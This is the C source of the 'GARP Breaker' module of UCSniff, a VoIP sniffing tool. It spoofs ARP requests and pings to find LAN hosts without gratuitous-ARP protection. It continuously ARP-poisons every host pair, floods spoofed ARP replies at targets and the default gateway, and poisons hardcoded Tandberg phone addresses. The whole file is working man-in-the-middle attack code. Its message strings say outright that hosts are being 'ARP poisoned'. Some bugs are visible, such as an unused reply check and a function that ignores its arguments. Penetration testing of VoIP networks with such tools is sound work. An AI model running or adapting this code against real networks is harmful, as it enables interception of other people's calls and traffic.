/* 
ucsniff - UCSniff -UC Sniffer 
garpb.c - GARP Breaker module for UCSniff 
Copyright (C) 2009 VIPER Lab
Harsh Kupwade harsh@viperlab.net

This file is part of UCSniff.

UCSniff is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.

UCSniff is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>.

*/


#include<ec.h>
#include <stdio.h>
#include <unistd.h>

#include <libnet.h>

#include <pcap.h>
#include <ec_send.h>
#include <ec_mitm.h>
#include <ec_ui.h>
#include <ec_threads.h>
#include <ec_voipglobals.h>
#include <ec_voiplogfiles.h>

#define GNIP_FILTER "icmp[0] = 0"
#define ETH_HEADER_SIZE 14

#include<strings.h>
#include <ec_scan.h>
#include <client.h>
#include <ec_garpb.h>

#ifndef OS_WINDOWS

#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <net/if.h>
#include <netinet/if_ether.h>

#endif

int flush;
struct garpdbParam{

	char sourceip[MAX_ASCII_ADDR_LEN];
	char targetip[MAX_ASCII_ADDR_LEN];
	char targetmac[MAX_ASCII_ADDR_LEN];
};

struct garpdbParam garpdbParamObj;

pcap_t *handle;

u_int16_t id, seq, count;
char *destipp;
char *tableGarp[200][200];
int cc=0, num =1, m;
char tableip[200][200];
char tablemac[200][200];

/* extern */
extern char router_ip[16];
extern void getmacfromip(char tempip[MAX_ASCII_ADDR_LEN], char tempmac[MAX_ASCII_ADDR_LEN]);

void* arpReplyPoison(void *);
void* arpRequestPoison(void *);	
void sendSingleSpoofedArpReply(char *, char *, char *);
void spoofedarprequest( char *tablesip, char *tabledip, char *tabledmac, char *sourcemac); 

void spoofedarprequest1( char *tablesip, char *tabledip, char *tabledmac); 

void pingtest(char *tablesip, char *tabledip, char *tabledmac);
int hostlist1(void);

void
packet_handler (u_char * user, const struct pcap_pkthdr *header,
        const u_char * packet)
{
  
     int answer =1;
     time_t tv;
     tv = time(NULL);
	
	struct libnet_icmpv4_hdr *icmpp =
    (struct libnet_icmpv4_hdr *) (packet + LIBNET_IPV4_H + LIBNET_ETH_H);



	if(id == icmpp->hun.echo.id && seq == icmpp->hun.echo.seq)
		{
		 // printf("\n %s has GARP feature enabled",destipp );
                 answer =0;

		}
}

int  hostlist1(void)
{
int gg, m, i;
struct hosts_list *hl;
char ip[MAX_ASCII_ADDR_LEN];
char mac[MAX_ASCII_ADDR_LEN];
m=0;
for(gg=0;gg<200;gg++)
{
  *tableip[gg] = 0;
  *tablemac[gg] = 0;
}
  
	    
   /* print the list */
   LIST_FOREACH(hl, &GBL_HOSTLIST, next) {
      
      ip_addr_ntoa(&hl->ip, ip);
      mac_addr_ntoa(hl->mac, mac);
     
       
         i++;
	 strcat(tableip[m],ip);

	 strcat(tablemac[m],mac);

	 m++;
     }

return(m);

}

void garpd(void)
{
 int m;
 
 m = hostlist1();
   int qq = 0;

// INSTANT_USER_MSG("\n The value of router_ip = %s \n", router_ip);
 INSTANT_USER_MSG("\nScanning for hosts that have GARP feature disabled \n");
 INSTANT_USER_MSG("\nHost lists \n");
 INSTANT_USER_MSG("\n-------------------------------------------------- \n");
 

num =1;

 for( qq=0; qq < m-1; qq++)
   {
	sleep(1);
	spoofedarprequest1(router_ip, tableip[qq], tablemac[qq] );
	pingtest(router_ip, tableip[qq], tablemac[qq]);
   }

  INSTANT_USER_MSG("-------------------------------------------------- \n");

}


void arp_poison()
{

 ec_thread_new("unicastarppoison", "sends unicast spoof arp packets", &arpRequestPoison, NULL);

}

void* arpRequestPoison(void *arg){

   ec_thread_init();
  
   int m;

   m = hostlist1();

   int nn, qq;

 INSTANT_USER_MSG("\nNew thread created to ARP poison the hosts with spoofed unicast ARP requests ...... \n");
 
   while(1) {

    for(nn=0; nn < m-1; nn++)
     {
           for(qq=0; qq < m; qq++)
           {
                   if(qq!=nn)
                        {
                                spoofedarprequest1(tableip[qq], tableip[nn], tablemac[nn]);
                        }
           }
     }

     sleep(5);

  }

}


void rearp_poison()
{
int m;

m = hostlist1();
int nn, qq;

char tablesip[] = "172.16.96.254";
char tablesmac[] ="00:12:01:CF:EF:42";
char tabledip1[] ="172.16.96.98";
char tabledmac1[] ="00:50:60:03:99:D0";
char tabledip2[] ="172.16.96.97";
char tabledmac2[] ="00:50:60:03:99:CB";


INSTANT_USER_MSG("\nRe-ARPing the hosts with unicast ARP request \n");
	
  for(nn=0; nn < m-1; nn++)
   {
	   for(qq=0; qq < m; qq++)
	   {
		   if(qq!=nn)
			{ 
				spoofedarprequest(tableip[qq], tablemac[qq], tableip[nn], tablemac[nn]);
			}
	   }
   }

INSTANT_USER_MSG("\nThe hosts have been re-ARPed \n");

INSTANT_USER_MSG("\nTandberg phones are being ARP poisoned\n");
INSTANT_USER_MSG("------------------------------------------");
sleep(5);
for(qq=0;qq<5;qq++)
{
	spoofedarprequest(tablesip,tablesmac, tabledip1, tabledmac1);
	spoofedarprequest(tablesip,tablesmac, tabledip2, tabledmac2);
}
INSTANT_USER_MSG("\nPhones have been ARP poisoned\n");
}

void pingtest(char *tablesip, char *tabledip, char *tabledmac )
{
	libnet_t *l = NULL;
	char c;
	u_int8_t *payload = NULL;
	u_int32_t payload_s = 0;
	libnet_ptag_t icmp = 0, ip = 0;
	char *device = NULL;
	char errbuf[LIBNET_ERRBUF_SIZE];
	in_addr_t ipaddr;
	in_addr_t destaddr;
	u_int8_t *macaddr;
	libnet_ptag_t eth = 0;
	struct libnet_ether_addr *hwaddr;
	int r;
	char *input_mac;
	int answer;
	pcap_t *handle;
	time_t tv;
        char libpcap_errbuf[PCAP_ERRBUF_SIZE];    /* pcap error messages */
/* GARP Sniffing */
 	bpf_u_int32 netp;   /* ip address of interface */
  	bpf_u_int32 maskp;    /* subnet mask of interface */
  	char *filter = " icmp[icmptype] == icmp-echoreply ";   /* filter for BPF (human readable) */

  	struct bpf_program fp;  /* compiled BPF filter */

	device = GBL_OPTIONS->iface;

	destipp=tabledip;

	if ((ipaddr = inet_addr (tablesip)) == -1) {
		INSTANT_USER_MSG( "Invalid claimed IP address\n");
	}

if ((destaddr = inet_addr (tabledip)) == -1) {
					INSTANT_USER_MSG( "Invalid destination IP address\n");
					   }
					
input_mac = tabledmac;

if ((macaddr = libnet_hex_aton (input_mac, &r)) == NULL) {
					//INSTANT_USER_MSG( "Error on MAC address\n");
					if(voipdebug) {
						fprintf(sccpfile,"Error on MAC Address\n");
						flush = fflush(sccpfile);
					}
				}

device = GBL_OPTIONS->iface;
/* initialize the libnet library */
		if (device == NULL)
		{
			device = pcap_lookupdev(errbuf);
			if (device == NULL)
			{
				INSTANT_USER_MSG( "pcap_lookupdev() failed: %s\n", errbuf);
				//goto bad;
			}
		}

l = libnet_init (LIBNET_LINK, GBL_OPTIONS->iface, errbuf);
	if (l == NULL) {
		INSTANT_USER_MSG( "Error opening context: %s", errbuf);
		//exit (1);
		return;
	}

	hwaddr = libnet_get_hwaddr (l);
      
// New Pcap added 

  /* open the device with pcap */
  if ((handle =
       pcap_open_live (device, 1500, 0, 2000, libpcap_errbuf)) == NULL)
    {
      INSTANT_USER_MSG( "Error opening pcap: %s\n", libpcap_errbuf);
      //exit (1);
	return;
    }

  if ((pcap_setnonblock (handle, 1, errbuf)) == -1)
    {
      INSTANT_USER_MSG( "Error setting nonblocking: %s\n", libpcap_errbuf);
      //exit (1);
	return;
    }

  /* set the capture filter */
  if (pcap_lookupnet (device, &netp, &maskp, libpcap_errbuf) == -1)
    {
      INSTANT_USER_MSG( "Net lookup error: %s\n", libpcap_errbuf);
      //exit (1);
	return;
    }

  if (pcap_compile (handle, &fp, filter, 0, maskp) == -1)
    {
      INSTANT_USER_MSG( "BPF error: %s\n", pcap_geterr (handle));
      //exit (1);
	return;
    }

  if (pcap_setfilter (handle, &fp) == -1)
    {
      INSTANT_USER_MSG( "Error setting BPF: %s\n", pcap_geterr (handle));
      //exit (1);
	return;
    }

  pcap_freecode (&fp);

	
			icmp = libnet_build_icmpv4_echo(
			ICMP_ECHO, /* type */
			0, /* code */
			0, /* checksum */
			id, /* id */
			seq, /* sequence number */
			payload, /* payload */
			payload_s, /* payload size */
			l, /* libnet context */
			icmp); /* ptag */
			if (icmp == -1)
			{
				INSTANT_USER_MSG( "Can't build ICMP header: %s\n",
				libnet_geterror(l));
				//goto bad;
			}

		ip = libnet_build_ipv4(
		 LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + payload_s, /* length */
		 0, /* TOS */
		 id, /* IP ID */
                 0, /* IP Frag */
		 64, /* TTL */
                 IPPROTO_ICMP, /* protocol */
                 0, /* checksum */
  		 ipaddr, /* source IP */
		 destaddr, /* destination IP */
		 NULL, /* payload */
		 0, /* payload size */
		 l, /* libnet context */
		 ip); /* ptag */
		 if (ip == -1)
			{
				INSTANT_USER_MSG( "Can't build IP header: %s\n", libnet_geterror(l));
				//goto bad;
			}


	eth = libnet_build_ethernet (macaddr, 
			hwaddr,
			ETHERTYPE_IP,
			NULL,
			0,
			l,
			0);

	if ( eth == -1) {
		INSTANT_USER_MSG( "Unable to build Ethernet header: %s\n", libnet_geterror (l));
		//exit (1);
		return;
	}

  /* we'll be nice and free the memory used for the compiled filter */
  pcap_freecode (&fp);
	       
		 c = libnet_write(l);
		 // printf("\n ICMP request sent to  %s", tabledip);
		 if (c == -1)
		 {
			INSTANT_USER_MSG( "Write error: %s\n", libnet_geterror(l));
			//goto bad;
		 }

/* Sniffing Traffic */


answer =1;
tv = time(NULL);

      /* capture the reply */
  while(answer)    
    if((time(NULL)-tv)>2)
	{
	  	c = pcap_dispatch (handle, -1, packet_handler, NULL);
		answer =0;
		
	}
	
     if(c == 0)
	{
		INSTANT_USER_MSG(" %d)\t %s \t %s\n",num,tabledip,tabledmac );
		strcat(tableGarp[cc],tabledip);
		cc++;
		num++;
		
	}

  /* close our devices */
  pcap_close (handle);

}

void spoofedarprequest1( char *tablesip, char *tabledip, char *tabledmac) 
{

	in_addr_t ipaddr;
	in_addr_t destaddr;
	u_int8_t *macaddr;
	libnet_t *l1;
	libnet_ptag_t arp = 0, eth = 0;
	struct libnet_ether_addr *hwaddr;
	char errbuf[LIBNET_ERRBUF_SIZE];
	int r;
	char *input_mac;


if ((ipaddr = inet_addr (tablesip)) == -1) {
					INSTANT_USER_MSG( "Invalid claimed IP address \n");
				}

if ((destaddr = inet_addr (tabledip)) == -1) {
					INSTANT_USER_MSG( "Invalid destination IP address 111 \n");
					   }
					
input_mac = tabledmac;

if ((macaddr = libnet_hex_aton (input_mac, &r)) == NULL) {
					//INSTANT_USER_MSG( "Error on MAC address\n");
					if(voipdebug) {
                                                fprintf(sccpfile,"Error on MAC Address\n");
                                                flush = fflush(sccpfile);
                                        }

				}



	

	l1 = libnet_init (LIBNET_LINK, GBL_OPTIONS->iface, errbuf);
	if (l1 == NULL) {
		INSTANT_USER_MSG( "Error opening context: %s", errbuf);
		//exit (1);
		return;
	}

	hwaddr = libnet_get_hwaddr (l1);

	arp = libnet_autobuild_arp (ARPOP_REQUEST,
			(u_int8_t *) hwaddr,
			(u_int8_t *) &ipaddr,
			macaddr,
			(u_int8_t *) &destaddr,
			l1);

	if ( arp == -1) {
		INSTANT_USER_MSG( "Unable to build ARP header: %s\n", libnet_geterror (l1));
		//exit (1);
		return;
	}

	eth = libnet_build_ethernet (macaddr, 
			(u_int8_t *) hwaddr,
			ETHERTYPE_ARP,
			NULL,
			0,
			l1,
			0);

	if ( eth == -1) {
		INSTANT_USER_MSG( "Unable to build Ethernet header: %s\n", libnet_geterror (l1));
		//exit (1);
		return;
	}
      
       int t;
  
       for(t=0;t<2;t++)
	{
	
		if (( libnet_write (l1)) == -1)
		 {
			INSTANT_USER_MSG( "Unable to send packet: %s\n", libnet_geterror (l1));
			//exit (1);
			return;
		 }
	}

	libnet_destroy(l1); 

}

void spoofedarprequest( char *tablesip, char * tablesmac, char *tabledip, char *tabledmac) 
{

	in_addr_t ipaddr;
	in_addr_t destaddr;
	u_int8_t *macaddr,*hwaddr1;
	libnet_t *l1;
	libnet_ptag_t arp = 0, eth = 0;
	struct libnet_ether_addr *hwaddr;
	char errbuf[LIBNET_ERRBUF_SIZE];
	int r;
	char *input_mac;


if ((ipaddr = inet_addr (tablesip)) == -1) {
					INSTANT_USER_MSG( "Invalid claimed IP address\n");
				}

if ((destaddr = inet_addr (tabledip)) == -1) {
					INSTANT_USER_MSG( "Invalid destination IP address\n");
					   }
input_mac = tablesmac;
if((hwaddr1 = libnet_hex_aton (input_mac, &r)) == NULL){
					//INSTANT_USER_MSG( "Error on MAC address\n");
						if(voipdebug) {
                                                	fprintf(sccpfile,"Error on MAC Address\n");
                                                	flush = fflush(sccpfile);
                                        	}

					}					

input_mac = tabledmac;

if ((macaddr = libnet_hex_aton (input_mac, &r)) == NULL) {
					//INSTANT_USER_MSG( "Error on MAC address\n");
					if(voipdebug) {
                                                fprintf(sccpfile,"Error on MAC Address\n");
                                                flush = fflush(sccpfile);
                                        }

				}

	l1 = libnet_init (LIBNET_LINK, GBL_OPTIONS->iface, errbuf);
	if (l1 == NULL) {
		INSTANT_USER_MSG( "Error opening context: %s", errbuf);
		//exit (1);
		return;
	}

	hwaddr = libnet_get_hwaddr (l1);

	arp = libnet_autobuild_arp (ARPOP_REQUEST,
			(u_int8_t *) hwaddr1,
			(u_int8_t *) &ipaddr,
			macaddr,
			(u_int8_t *) &destaddr,
			l1);

	if ( arp == -1) {
		INSTANT_USER_MSG( "Unable to build ARP header: %s\n", libnet_geterror (l1));
		//exit (1);
		return;
	}

	eth = libnet_build_ethernet (macaddr, 
			hwaddr1,
			ETHERTYPE_ARP,
			NULL,
			0,
			l1,
			0);

	if ( eth == -1) {
		INSTANT_USER_MSG( "Unable to build Ethernet header: %s\n", libnet_geterror (l1));
		//exit (1);
		return;
	}
      
       int t;
  
       for(t=0;t<2;t++)
	{
	
		if (( libnet_write (l1)) == -1)
		 {
			INSTANT_USER_MSG( "Unable to send packet: %s\n", libnet_geterror (l1));
			//exit (1);
			return;
		 }
	}

	libnet_destroy(l1); 
}

void sendSpoofedArpReply(char *sourceip, char *targetip, char *targetmac){

	memset(garpdbParamObj.sourceip,'\0',sizeof(garpdbParamObj.sourceip));
	memset(garpdbParamObj.targetip,'\0',sizeof(garpdbParamObj.targetip));
	memset(garpdbParamObj.targetmac,'\0',sizeof(garpdbParamObj.targetmac));

	memcpy(garpdbParamObj.sourceip, sourceip, sizeof(garpdbParamObj.sourceip));
	memcpy(garpdbParamObj.targetip,targetip,sizeof(garpdbParamObj.targetip));
	memcpy(garpdbParamObj.targetmac,targetmac,sizeof(garpdbParamObj.targetmac));

	pthread_t threads[1];
 	int rc;

 	rc = pthread_create(&threads[0],NULL,arpReplyPoison,NULL);
 	if(rc){
        	INSTANT_USER_MSG("Error, creating thread to arp poison, error code is %d\n",rc);
        	INSTANT_USER_MSG("Failed to ARP poison the hosts with unicast ARP requests\n");
        	return;
  	}	
	
	/* I am adding the the usleep here because the thread argument passing is incorrect and not thread safe. I will fix it in soon */	
	usleep(100);
}

void *arpReplyPoison(void *arg){

	in_addr_t ipaddr;
        in_addr_t destaddr;
        u_int8_t *macaddr;
        libnet_t *l1;
        libnet_ptag_t arp = 0, eth = 0;
        struct libnet_ether_addr *hwaddr;
        char errbuf[LIBNET_ERRBUF_SIZE];
        int r;
        //char *input_mac;

	char tablesip[MAX_ASCII_ADDR_LEN];
	char tabledip[MAX_ASCII_ADDR_LEN];
	char tabledmac[MAX_ASCII_ADDR_LEN];

	memcpy(tablesip, garpdbParamObj.sourceip, sizeof(tablesip));
	memcpy(tabledip, garpdbParamObj.targetip, sizeof(tabledip));
	memcpy(tabledmac, garpdbParamObj.targetmac, sizeof(tabledmac));

	if ((ipaddr = inet_addr (tablesip)) == -1) {
        	INSTANT_USER_MSG( "Invalid claimed IP address \n");
		return NULL;
        }

	if ((destaddr = inet_addr (tabledip)) == -1) {
        	INSTANT_USER_MSG( "Invalid destination IP address 111 \n");
		return NULL;
        }

	//input_mac = tabledmac;

	if ((macaddr = libnet_hex_aton (tabledmac, &r)) == NULL) {
        	//INSTANT_USER_MSG( "Error on MAC address\n");
		if(voipdebug) {
			fprintf(sccpfile,"Error on MAC Address\n");
			flush = fflush(sccpfile);
		}

		return NULL;
        }

        l1 = libnet_init (LIBNET_LINK, GBL_OPTIONS->iface, errbuf);
        if (l1 == NULL) {
                INSTANT_USER_MSG( "Error opening context: %s", errbuf);
                //exit (1);
                return NULL;
        }

	hwaddr = libnet_get_hwaddr (l1);

        arp = libnet_autobuild_arp (ARPOP_REPLY,
                        (u_int8_t *) hwaddr,
                        (u_int8_t *) &ipaddr,
                        macaddr,
                        (u_int8_t *) &destaddr,
                        l1);

        if ( arp == -1) {
                INSTANT_USER_MSG( "Unable to build ARP header: %s\n", libnet_geterror (l1));
                //exit (1);
                return NULL;
        }

        eth = libnet_build_ethernet (macaddr,
                        (u_int8_t *) hwaddr,
                        ETHERTYPE_ARP,
                        NULL,
                        0,
                        l1,
                        0);

        if ( eth == -1) {
                INSTANT_USER_MSG( "Unable to build Ethernet header: %s\n", libnet_geterror (l1));
                //exit (1);
                return NULL;
        }

       int t;

	for(t=0;t<1500;t++)
        {

                if (( libnet_write (l1)) == -1)
                 {
                        INSTANT_USER_MSG( "Unable to send packet: %s\n", libnet_geterror (l1));
                        //exit (1);
                        return NULL;
                 }
		 usleep(80);
        }

        libnet_destroy(l1);


	/* Here we are arp poisoning the default gateway, because when the phone sends the arp request, the default gateway gets re-arp'd */
	if(strlen(router_ip) > 0){
		char tempmac[MAX_ASCII_ADDR_LEN];
		getmacfromip(router_ip,tempmac);
		sendSingleSpoofedArpReply(tablesip, router_ip, tempmac);
	}
	return NULL;
}

void sendSingleSpoofedArpReply(char *sourceip, char *targetip, char *targetmac){

	in_addr_t ipaddr;
        in_addr_t destaddr;
        u_int8_t *macaddr;
        libnet_t *l1;
        libnet_ptag_t arp = 0, eth = 0;
        struct libnet_ether_addr *hwaddr;
        char errbuf[LIBNET_ERRBUF_SIZE];
        int r;
        //char *input_mac;

        char tablesip[MAX_ASCII_ADDR_LEN];
        char tabledip[MAX_ASCII_ADDR_LEN];
        char tabledmac[MAX_ASCII_ADDR_LEN];

        memcpy(tablesip, garpdbParamObj.sourceip, sizeof(tablesip));
        memcpy(tabledip, garpdbParamObj.targetip, sizeof(tabledip));
        memcpy(tabledmac, garpdbParamObj.targetmac, sizeof(tabledmac));

        if ((ipaddr = inet_addr (tablesip)) == -1) {
                INSTANT_USER_MSG( "Invalid claimed IP address \n");
		return;
        }

        if ((destaddr = inet_addr (tabledip)) == -1) {
                INSTANT_USER_MSG( "Invalid destination IP address 111 \n");
		return;
        }

        //input_mac = tabledmac;

        if ((macaddr = libnet_hex_aton (tabledmac, &r)) == NULL) {
                //INSTANT_USER_MSG( "Error on MAC address\n");
		if(voipdebug) {
			fprintf(sccpfile,"Error on MAC Address\n");
			flush = fflush(sccpfile);
		}

		return;
        }

        l1 = libnet_init (LIBNET_LINK, GBL_OPTIONS->iface, errbuf);
        if (l1 == NULL) {
                INSTANT_USER_MSG( "Error opening context: %s", errbuf);
                //exit (1);
                return;
        }

	hwaddr = libnet_get_hwaddr (l1);

        arp = libnet_autobuild_arp (ARPOP_REPLY,
                        (u_int8_t *) hwaddr,
                        (u_int8_t *) &ipaddr,
                        macaddr,
                        (u_int8_t *) &destaddr,
                        l1);

        if ( arp == -1) {
                INSTANT_USER_MSG( "Unable to build ARP header: %s\n", libnet_geterror (l1));
                //exit (1);
                return;
        }

        eth = libnet_build_ethernet (macaddr,
                        (u_int8_t *) hwaddr,
                        ETHERTYPE_ARP,
                        NULL,
                        0,
                        l1,
                        0);

        if ( eth == -1) {
                INSTANT_USER_MSG( "Unable to build Ethernet header: %s\n", libnet_geterror (l1));
                //exit (1);
                return;
        }

        if (( libnet_write (l1)) == -1)
        {
        	INSTANT_USER_MSG( "Unable to send packet: %s\n", libnet_geterror (l1));
                return;
	}

	libnet_destroy(l1);
}

